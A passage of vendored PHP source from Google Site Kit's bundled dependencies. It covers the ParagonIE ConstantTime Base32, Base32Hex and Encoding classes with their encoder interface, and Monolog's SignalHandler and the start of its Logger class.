portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Base32 * [A-Z][2-7] * * @package ParagonIE\ConstantTime */ abstract class Base32 implements \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\EncoderInterface { /** * Decode a Base32-encoded string into raw binary * * @param string $encodedString * @param bool $strictPadding * @return string */ public static function decode( #[\SensitiveParameter] string $encodedString, bool $strictPadding = \false ) : string { return static::doDecode($encodedString, \false, $strictPadding); } /** * Decode an uppercase Base32-encoded string into raw binary * * @param string $src * @param bool $strictPadding * @return string */ public static function decodeUpper( #[\SensitiveParameter] string $src, bool $strictPadding = \false ) : string { return static::doDecode($src, \true, $strictPadding); } /** * Encode into Base32 (RFC 4648) * * @param string $binString * @return string * @throws TypeError */ public static function encode( #[\SensitiveParameter] string $binString ) : string { return static::doEncode($binString, \false, \true); } /** * Encode into Base32 (RFC 4648) * * @param string $src * @return string * @throws TypeError */ public static function encodeUnpadded( #[\SensitiveParameter] string $src ) : string { return static::doEncode($src, \false, \false); } /** * Encode into uppercase Base32 (RFC 4648) * * @param string $src * @return string * @throws TypeError */ public static function encodeUpper( #[\SensitiveParameter] string $src ) : string { return static::doEncode($src, \true, \true); } /** * Encode into uppercase Base32 (RFC 4648) * * @param string $src * @return string * @throws TypeError */ public static function encodeUpperUnpadded( #[\SensitiveParameter] string $src ) : string { return static::doEncode($src, \true, \false); } /** * Uses bitwise operators instead of table-lookups to turn 5-bit integers * into 8-bit integers. * * @param int $src * @return int */ protected static function decode5Bits(int $src) : int { $ret = -1; // if ($src > 96 && $src < 123) $ret += $src - 97 + 1; // -64 $ret += (0x60 - $src & $src - 0x7b) >> 8 & $src - 96; // if ($src > 0x31 && $src < 0x38) $ret += $src - 24 + 1; // -23 $ret += (0x31 - $src & $src - 0x38) >> 8 & $src - 23; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 5-bit integers * into 8-bit integers. * * Uppercase variant. * * @param int $src * @return int */ protected static function decode5BitsUpper(int $src) : int { $ret = -1; // if ($src > 64 && $src < 91) $ret += $src - 65 + 1; // -64 $ret += (0x40 - $src & $src - 0x5b) >> 8 & $src - 64; // if ($src > 0x31 && $src < 0x38) $ret += $src - 24 + 1; // -23 $ret += (0x31 - $src & $src - 0x38) >> 8 & $src - 23; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * @param int $src * @return string */ protected static function encode5Bits(int $src) : string { $diff = 0x61; // if ($src > 25) $ret -= 72; $diff -= 25 - $src >> 8 & 73; return \pack('C', $src + $diff); } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * Uppercase variant. * * @param int $src * @return string */ protected static function encode5BitsUpper(int $src) : string { $diff = 0x41; // if ($src > 25) $ret -= 40; $diff -= 25 - $src >> 8 & 41; return \pack('C', $src + $diff); } /** * @param string $encodedString * @param bool $upper * @return string */ public static function decodeNoPadding( #[\SensitiveParameter] string $encodedString, bool $upper = \false ) : string { $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($encodedString); if ($srcLen === 0) { return ''; } if (($srcLen & 7) === 0) { for ($j = 0; $j < 7 && $j < $srcLen; ++$j) { if ($encodedString[$srcLen - $j - 1] === '=') { throw new \InvalidArgumentException("decodeNoPadding() doesn't tolerate padding"); } } } return static::doDecode($encodedString, $upper, \true); } /** * Base32 decoding * * @param string $src * @param bool $upper * @param bool $strictPadding * @return string * * @throws TypeError */ protected static function doDecode( #[\SensitiveParameter] string $src, bool $upper = \false, bool $strictPadding = \false ) : string { // We do this to reduce code duplication: $method = $upper ? 'decode5BitsUpper' : 'decode5Bits'; // Remove padding $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($src); if ($srcLen === 0) { return ''; } if ($strictPadding) { if (($srcLen & 7) === 0) { for ($j = 0; $j < 7; ++$j) { if ($src[$srcLen - 1] === '=') { $srcLen--; } else { break; } } } if (($srcLen & 7) === 1) { throw new \RangeException('Incorrect padding'); } } else { $src = \rtrim($src, '='); $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($src); } $err = 0; $dest = ''; // Main loop (no padding): for ($i = 0; $i + 8 <= $srcLen; $i += 8) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($src, $i, 8)); /** @var int $c0 */ $c0 = static::$method($chunk[1]); /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); /** @var int $c5 */ $c5 = static::$method($chunk[6]); /** @var int $c6 */ $c6 = static::$method($chunk[7]); /** @var int $c7 */ $c7 = static::$method($chunk[8]); $dest .= \pack('CCCCC', ($c0 << 3 | $c1 >> 2) & 0xff, ($c1 << 6 | $c2 << 1 | $c3 >> 4) & 0xff, ($c3 << 4 | $c4 >> 1) & 0xff, ($c4 << 7 | $c5 << 2 | $c6 >> 3) & 0xff, ($c6 << 5 | $c7) & 0xff); $err |= ($c0 | $c1 | $c2 | $c3 | $c4 | $c5 | $c6 | $c7) >> 8; } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($src, $i, $srcLen - $i)); /** @var int $c0 */ $c0 = static::$method($chunk[1]); if ($i + 6 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); /** @var int $c5 */ $c5 = static::$method($chunk[6]); /** @var int $c6 */ $c6 = static::$method($chunk[7]); $dest .= \pack('CCCC', ($c0 << 3 | $c1 >> 2) & 0xff, ($c1 << 6 | $c2 << 1 | $c3 >> 4) & 0xff, ($c3 << 4 | $c4 >> 1) & 0xff, ($c4 << 7 | $c5 << 2 | $c6 >> 3) & 0xff); $err |= ($c0 | $c1 | $c2 | $c3 | $c4 | $c5 | $c6) >> 8; if ($strictPadding) { $err |= $c6 << 5 & 0xff; } } elseif ($i + 5 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); /** @var int $c5 */ $c5 = static::$method($chunk[6]); $dest .= \pack('CCCC', ($c0 << 3 | $c1 >> 2) & 0xff, ($c1 << 6 | $c2 << 1 | $c3 >> 4) & 0xff, ($c3 << 4 | $c4 >> 1) & 0xff, ($c4 << 7 | $c5 << 2) & 0xff); $err |= ($c0 | $c1 | $c2 | $c3 | $c4 | $c5) >> 8; } elseif ($i + 4 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); $dest .= \pack('CCC', ($c0 << 3 | $c1 >> 2) & 0xff, ($c1 << 6 | $c2 << 1 | $c3 >> 4) & 0xff, ($c3 << 4 | $c4 >> 1) & 0xff); $err |= ($c0 | $c1 | $c2 | $c3 | $c4) >> 8; if ($strictPadding) { $err |= $c4 << 7 & 0xff; } } elseif ($i + 3 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); $dest .= \pack('CC', ($c0 << 3 | $c1 >> 2) & 0xff, ($c1 << 6 | $c2 << 1 | $c3 >> 4) & 0xff); $err |= ($c0 | $c1 | $c2 | $c3) >> 8; if ($strictPadding) { $err |= $c3 << 4 & 0xff; } } elseif ($i + 2 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); $dest .= \pack('CC', ($c0 << 3 | $c1 >> 2) & 0xff, ($c1 << 6 | $c2 << 1) & 0xff); $err |= ($c0 | $c1 | $c2) >> 8; if ($strictPadding) { $err |= $c2 << 6 & 0xff; } } elseif ($i + 1 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); $dest .= \pack('C', ($c0 << 3 | $c1 >> 2) & 0xff); $err |= ($c0 | $c1) >> 8; if ($strictPadding) { $err |= $c1 << 6 & 0xff; } } else { $dest .= \pack('C', $c0 << 3 & 0xff); $err |= $c0 >> 8; } } $check = $err === 0; if (!$check) { throw new \RangeException('Base32::doDecode() only expects characters in the correct base32 alphabet'); } return $dest; } /** * Base32 Encoding * * @param string $src * @param bool $upper * @param bool $pad * @return string * @throws TypeError */ protected static function doEncode( #[\SensitiveParameter] string $src, bool $upper = \false, $pad = \true ) : string { // We do this to reduce code duplication: $method = $upper ? 'encode5BitsUpper' : 'encode5Bits'; $dest = ''; $srcLen = \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeStrlen($src); // Main loop (no padding): for ($i = 0; $i + 5 <= $srcLen; $i += 5) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($src, $i, 5)); $b0 = $chunk[1]; $b1 = $chunk[2]; $b2 = $chunk[3]; $b3 = $chunk[4]; $b4 = $chunk[5]; $dest .= static::$method($b0 >> 3 & 31) . static::$method(($b0 << 2 | $b1 >> 6) & 31) . static::$method($b1 >> 1 & 31) . static::$method(($b1 << 4 | $b2 >> 4) & 31) . static::$method(($b2 << 1 | $b3 >> 7) & 31) . static::$method($b3 >> 2 & 31) . static::$method(($b3 << 3 | $b4 >> 5) & 31) . static::$method($b4 & 31); } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array<int, int> $chunk */ $chunk = \unpack('C*', \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Binary::safeSubstr($src, $i, $srcLen - $i)); $b0 = $chunk[1]; if ($i + 3 < $srcLen) { $b1 = $chunk[2]; $b2 = $chunk[3]; $b3 = $chunk[4]; $dest .= static::$method($b0 >> 3 & 31) . static::$method(($b0 << 2 | $b1 >> 6) & 31) . static::$method($b1 >> 1 & 31) . static::$method(($b1 << 4 | $b2 >> 4) & 31) . static::$method(($b2 << 1 | $b3 >> 7) & 31) . static::$method($b3 >> 2 & 31) . static::$method($b3 << 3 & 31); if ($pad) { $dest .= '='; } } elseif ($i + 2 < $srcLen) { $b1 = $chunk[2]; $b2 = $chunk[3]; $dest .= static::$method($b0 >> 3 & 31) . static::$method(($b0 << 2 | $b1 >> 6) & 31) . static::$method($b1 >> 1 & 31) . static::$method(($b1 << 4 | $b2 >> 4) & 31) . static::$method($b2 << 1 & 31); if ($pad) { $dest .= '==='; } } elseif ($i + 1 < $srcLen) { $b1 = $chunk[2]; $dest .= static::$method($b0 >> 3 & 31) . static::$method(($b0 << 2 | $b1 >> 6) & 31) . static::$method($b1 >> 1 & 31) . static::$method($b1 << 4 & 31); if ($pad) { $dest .= '===='; } } else { $dest .= static::$method($b0 >> 3 & 31) . static::$method($b0 << 2 & 31); if ($pad) { $dest .= '======'; } } } return $dest; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Base32Hex * [0-9][A-V] * * @package ParagonIE\ConstantTime */ abstract class Base32Hex extends \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32 { /** * Uses bitwise operators instead of table-lookups to turn 5-bit integers * into 8-bit integers. * * @param int $src * @return int */ protected static function decode5Bits(int $src) : int { $ret = -1; // if ($src > 0x30 && $src < 0x3a) ret += $src - 0x2e + 1; // -47 $ret += (0x2f - $src & $src - 0x3a) >> 8 & $src - 47; // if ($src > 0x60 && $src < 0x77) ret += $src - 0x61 + 10 + 1; // -86 $ret += (0x60 - $src & $src - 0x77) >> 8 & $src - 86; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 5-bit integers * into 8-bit integers. * * @param int $src * @return int */ protected static function decode5BitsUpper(int $src) : int { $ret = -1; // if ($src > 0x30 && $src < 0x3a) ret += $src - 0x2e + 1; // -47 $ret += (0x2f - $src & $src - 0x3a) >> 8 & $src - 47; // if ($src > 0x40 && $src < 0x57) ret += $src - 0x41 + 10 + 1; // -54 $ret += (0x40 - $src & $src - 0x57) >> 8 & $src - 54; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * @param int $src * @return string */ protected static function encode5Bits(int $src) : string { $src += 0x30; // if ($src > 0x39) $src += 0x61 - 0x3a; // 39 $src += 0x39 - $src >> 8 & 39; return \pack('C', $src); } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * Uppercase variant. * * @param int $src * @return string */ protected static function encode5BitsUpper(int $src) : string { $src += 0x30; // if ($src > 0x39) $src += 0x41 - 0x3a; // 7 $src += 0x39 - $src >> 8 & 7; return \pack('C', $src); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; use TypeError; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Class Encoding * @package ParagonIE\ConstantTime */ abstract class Encoding { /** * RFC 4648 Base32 encoding * * @param string $str * @return string * @throws TypeError */ public static function base32Encode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::encode($str); } /** * RFC 4648 Base32 encoding * * @param string $str * @return string * @throws TypeError */ public static function base32EncodeUpper( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::encodeUpper($str); } /** * RFC 4648 Base32 decoding * * @param string $str * @return string * @throws TypeError */ public static function base32Decode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::decode($str); } /** * RFC 4648 Base32 decoding * * @param string $str * @return string * @throws TypeError */ public static function base32DecodeUpper( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32::decodeUpper($str); } /** * RFC 4648 Base32 encoding * * @param string $str * @return string * @throws TypeError */ public static function base32HexEncode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32Hex::encode($str); } /** * RFC 4648 Base32Hex encoding * * @param string $str * @return string * @throws TypeError */ public static function base32HexEncodeUpper( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32Hex::encodeUpper($str); } /** * RFC 4648 Base32Hex decoding * * @param string $str * @return string * @throws TypeError */ public static function base32HexDecode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32Hex::decode($str); } /** * RFC 4648 Base32Hex decoding * * @param string $str * @return string * @throws TypeError */ public static function base32HexDecodeUpper( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base32Hex::decodeUpper($str); } /** * RFC 4648 Base64 encoding * * @param string $str * @return string * @throws TypeError */ public static function base64Encode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64::encode($str); } /** * RFC 4648 Base64 decoding * * @param string $str * @return string * @throws TypeError */ public static function base64Decode( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64::decode($str); } /** * Encode into Base64 * * Base64 character set "./[A-Z][a-z][0-9]" * @param string $str * @return string * @throws TypeError */ public static function base64EncodeDotSlash( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64DotSlash::encode($str); } /** * Decode from base64 to raw binary * * Base64 character set "./[A-Z][a-z][0-9]" * * @param string $str * @return string * @throws \RangeException * @throws TypeError */ public static function base64DecodeDotSlash( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64DotSlash::decode($str); } /** * Encode into Base64 * * Base64 character set "[.-9][A-Z][a-z]" or "./[0-9][A-Z][a-z]" * @param string $str * @return string * @throws TypeError */ public static function base64EncodeDotSlashOrdered( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64DotSlashOrdered::encode($str); } /** * Decode from base64 to raw binary * * Base64 character set "[.-9][A-Z][a-z]" or "./[0-9][A-Z][a-z]" * * @param string $str * @return string * @throws \RangeException * @throws TypeError */ public static function base64DecodeDotSlashOrdered( #[\SensitiveParameter] string $str ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Base64DotSlashOrdered::decode($str); } /** * Convert a binary string into a hexadecimal string without cache-timing * leaks * * @param string $bin_string (raw binary) * @return string * @throws TypeError */ public static function hexEncode( #[\SensitiveParameter] string $bin_string ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Hex::encode($bin_string); } /** * Convert a hexadecimal string into a binary string without cache-timing * leaks * * @param string $hex_string * @return string (raw binary) * @throws \RangeException */ public static function hexDecode( #[\SensitiveParameter] string $hex_string ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Hex::decode($hex_string); } /** * Convert a binary string into a hexadecimal string without cache-timing * leaks * * @param string $bin_string (raw binary) * @return string * @throws TypeError */ public static function hexEncodeUpper( #[\SensitiveParameter] string $bin_string ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Hex::encodeUpper($bin_string); } /** * Convert a binary string into a hexadecimal string without cache-timing * leaks * * @param string $bin_string (raw binary) * @return string */ public static function hexDecodeUpper( #[\SensitiveParameter] string $bin_string ) : string { return \Google\Site_Kit_Dependencies\ParagonIE\ConstantTime\Hex::decode($bin_string); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\ParagonIE\ConstantTime; /** * Copyright (c) 2016 - 2022 Paragon Initiative Enterprises. * Copyright (c) 2014 Steve "Sc00bz" Thomas (steve at tobtu dot com) * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ /** * Interface EncoderInterface * @package ParagonIE\ConstantTime */ interface EncoderInterface { /** * Convert a binary string into a hexadecimal string without cache-timing * leaks * * @param string $binString (raw binary) * @return string */ public static function encode(string $binString) : string; /** * Convert a binary string into a hexadecimal string without cache-timing * leaks * * @param string $encodedString * @param bool $strictPadding Error on invalid padding * @return string (raw binary) */ public static function decode(string $encodedString, bool $strictPadding = \false) : string; } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; use ReflectionExtension; /** * Monolog POSIX signal handler * * @author Robert Gust-Bardon <robert@gust-bardon.org> * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class SignalHandler { /** @var LoggerInterface */ private $logger; /** @var array<int, callable|string|int> SIG_DFL, SIG_IGN or previous callable */ private $previousSignalHandler = []; /** @var array<int, int> */ private $signalLevelMap = []; /** @var array<int, bool> */ private $signalRestartSyscalls = []; public function __construct(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger) { $this->logger = $logger; } /** * @param int|string $level Level or level name * @param bool $callPrevious * @param bool $restartSyscalls * @param bool|null $async * @return $this * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function registerSignalHandler(int $signo, $level = \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, bool $callPrevious = \true, bool $restartSyscalls = \true, ?bool $async = \true) : self { if (!\extension_loaded('pcntl') || !\function_exists('pcntl_signal')) { return $this; } $level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); if ($callPrevious) { $handler = \pcntl_signal_get_handler($signo); $this->previousSignalHandler[$signo] = $handler; } else { unset($this->previousSignalHandler[$signo]); } $this->signalLevelMap[$signo] = $level; $this->signalRestartSyscalls[$signo] = $restartSyscalls; if ($async !== null) { \pcntl_async_signals($async); } \pcntl_signal($signo, [$this, 'handleSignal'], $restartSyscalls); return $this; } /** * @param mixed $siginfo */ public function handleSignal(int $signo, $siginfo = null) : void { static $signals = []; if (!$signals && \extension_loaded('pcntl')) { $pcntl = new \ReflectionExtension('pcntl'); // HHVM 3.24.2 returns an empty array. foreach ($pcntl->getConstants() ?: \get_defined_constants(\true)['Core'] as $name => $value) { if (\substr($name, 0, 3) === 'SIG' && $name[3] !== '_' && \is_int($value)) { $signals[$value] = $name; } } } $level = $this->signalLevelMap[$signo] ?? \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL; $signal = $signals[$signo] ?? $signo; $context = $siginfo ?? []; $this->logger->log($level, \sprintf('Program received signal %s', $signal), $context); if (!isset($this->previousSignalHandler[$signo])) { return; } if ($this->previousSignalHandler[$signo] === \SIG_DFL) { if (\extension_loaded('pcntl') && \function_exists('pcntl_signal') && \function_exists('pcntl_sigprocmask') && \function_exists('pcntl_signal_dispatch') && \extension_loaded('posix') && \function_exists('posix_getpid') && \function_exists('posix_kill')) { $restartSyscalls = $this->signalRestartSyscalls[$signo] ?? \true; \pcntl_signal($signo, \SIG_DFL, $restartSyscalls); \pcntl_sigprocmask(\SIG_UNBLOCK, [$signo], $oldset); \posix_kill(\posix_getpid(), $signo); \pcntl_signal_dispatch(); \pcntl_sigprocmask(\SIG_SETMASK, $oldset); \pcntl_signal($signo, [$this, 'handleSignal'], $restartSyscalls); } } elseif (\is_callable($this->previousSignalHandler[$signo])) { $this->previousSignalHandler[$signo]($signo, $siginfo); } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; use DateTimeZone; use Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; use Google\Site_Kit_Dependencies\Psr\Log\InvalidArgumentException; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; use Throwable; use Stringable; /** * Monolog log channel * * It contains a stack of Handlers and a stack of Processors, * and uses them to store records that are added to it. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-type Level Logger::DEBUG|Logger::INFO|Logger::NOTICE|Logger::WARNING|Logger::ERROR|Logger::CRITICAL|Logger::ALERT|Logger::EMERGENCY * @phpstan-type LevelName 'DEBUG'|'INFO'|'NOTICE'|'WARNING'|'ERROR'|'CRITICAL'|'ALERT'|'EMERGENCY' * @phpstan-type Record array{message: string, context: mixed[], level: Level, level_name: LevelName, channel: string, datetime: \DateTimeImmutable, extra: mixed[]} */ class Logger implements \Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface, \Google\Site_Kit_Dependencies\Monolog\ResettableInterface { /** * Detailed debug information */ public const DEBUG = 100; /** * Interesting events * * Examples: User logs in, SQL logs. */ public const INFO = 200; /** * Uncommon events */ public const NOTICE = 250; /** * Exceptional occurrences that are not errors * * Examples: Use of deprecated APIs, poor use of an API, * undesirable things that are not necessarily wrong. */ public const WARNING = 300; /** * Runtime errors */ public const ERROR = 400; /** * Critical conditions * * Example: Application component unavailable, unexpected exception. */ public const CRITICAL = 500; /** * Action must be taken immediately * * Example: Entire website down, database unavailable, etc. * This should trigger the SMS alerts and wake you up. */ public const ALERT = 550; /** * Urgent alert. */ public const EMERGENCY = 600; /** * Monolog API version * * This is only bumped when API breaks are done and should * follow the major version of the library * * @var int */ public const API = 2; /** * This is a static variable and not a constant to serve as an extension point for custom levels * * @var array<int, string> $levels Logging levels with the levels as key * * @phpstan-var array<Level, LevelName> $levels Logging levels with the levels as key */ protected static $levels = [self::DEBUG => 'DEBUG', self::INFO => 'INFO', self::NOTICE => 'NOTICE', self::WARNING => 'WARNING', self::ERROR => 'ERROR', self::CRITICAL => 'CRITICAL', self::ALERT => 'ALERT', self::EMERGENCY => 'EMERGENCY']; /** * Mapping between levels numbers defined in RFC 5424 and Monolog ones * * @phpstan-var array<int, Level> $rfc_5424_levels */ private const RFC_5424_LEVELS = [7 => self::DEBUG, 6 => self::INFO, 5 => self::NOTICE, 4 => self::WARNING, 3 => self::ERROR, 2 => self::CRITICAL, 1 => self::ALERT, 0 => self::EMERGENCY]; /** * @var string */ protected $name; /** * The handler stack * * @var HandlerInterface[] */ protected $handlers; /** * Processors that will process all log records * * To process records of a single handler instead, add the processor on that specific handler * * @var callable[] */ protected $processors; /** * @var bool */ protected $microsecondTimestamps = \true; /** * @var DateTimeZone */ protected $timezone; /** * @var callable|null */ protected $exceptionHandler; /** * @var int Keeps track of depth to prevent infinite logging loops */ private $logDepth = 0; /** * @var \WeakMap<\Fiber<mixed, mixed, mixed, mixed>, int> Keeps track of depth inside fibers to prevent infinite logging loops */ private $fiberLogDepth; /** * @var bool Whether to detect infinite logging loops * * This can be disabled via {@see useLoggingLoopDetection} if you have async handlers that do not play well with this */ private $detectCycles = \true; /** * @psalm-param array<callable(array): array> $processors * * @param string $name The logging channel, a simple descriptive name that is attached to all log records * @param HandlerInterface[] $handlers Optional stack of handlers, the first one in the array is called first, etc. * @param callable[] $processors Optional array of processors * @param DateTimeZone|null $timezone Optional timezone, if not provided date_default_timezone_get() will be used */ public function __construct(string $name, array $handlers = [], array $processors = [], ?\DateTimeZone $timezone = null) { $this->name = $name; $this->setHandlers($handlers); $this->processors = $processors; $this->timezone = $timezone ?: new \DateTimeZone(\date_default_timezone_get() ?: 'UTC'); if (\PHP_VERSION_ID >= 80100) { // Local variable for phpstan, see https://github.com/phpstan/phpstan/issues/6732#issuecomment-1111118412 /** @var 